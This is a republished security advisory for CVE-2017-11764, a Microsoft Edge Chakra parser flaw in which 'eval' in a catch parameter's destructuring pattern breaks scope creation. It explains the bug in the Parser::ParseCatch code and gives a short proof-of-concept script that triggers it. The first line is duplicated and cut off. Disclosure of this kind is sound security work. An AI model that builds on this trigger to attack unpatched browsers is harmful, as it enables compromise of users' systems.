Microsoft Edge: Chakra: Parser::ParseCatch doesn't handle "eval"
CVE-2017-11764
In Javascript, the code executed by a direct call to eval shares the caller b Microsoft Edge: Chakra: Parser::ParseCatch doesn't handle "eval"
CVE-2017-11764
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
ParseNodePtr Parser::ParseCatch()
{
...
pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
...
ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
...
}
1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
PoC:
function f() {
{
let i;
function g() {
i;
}
try {
throw 1;
} catch ({e = eval('dd')}) {
}
}
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
Microsoft Edge Chakra Parser ParseCatch Failed eval Handle
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 386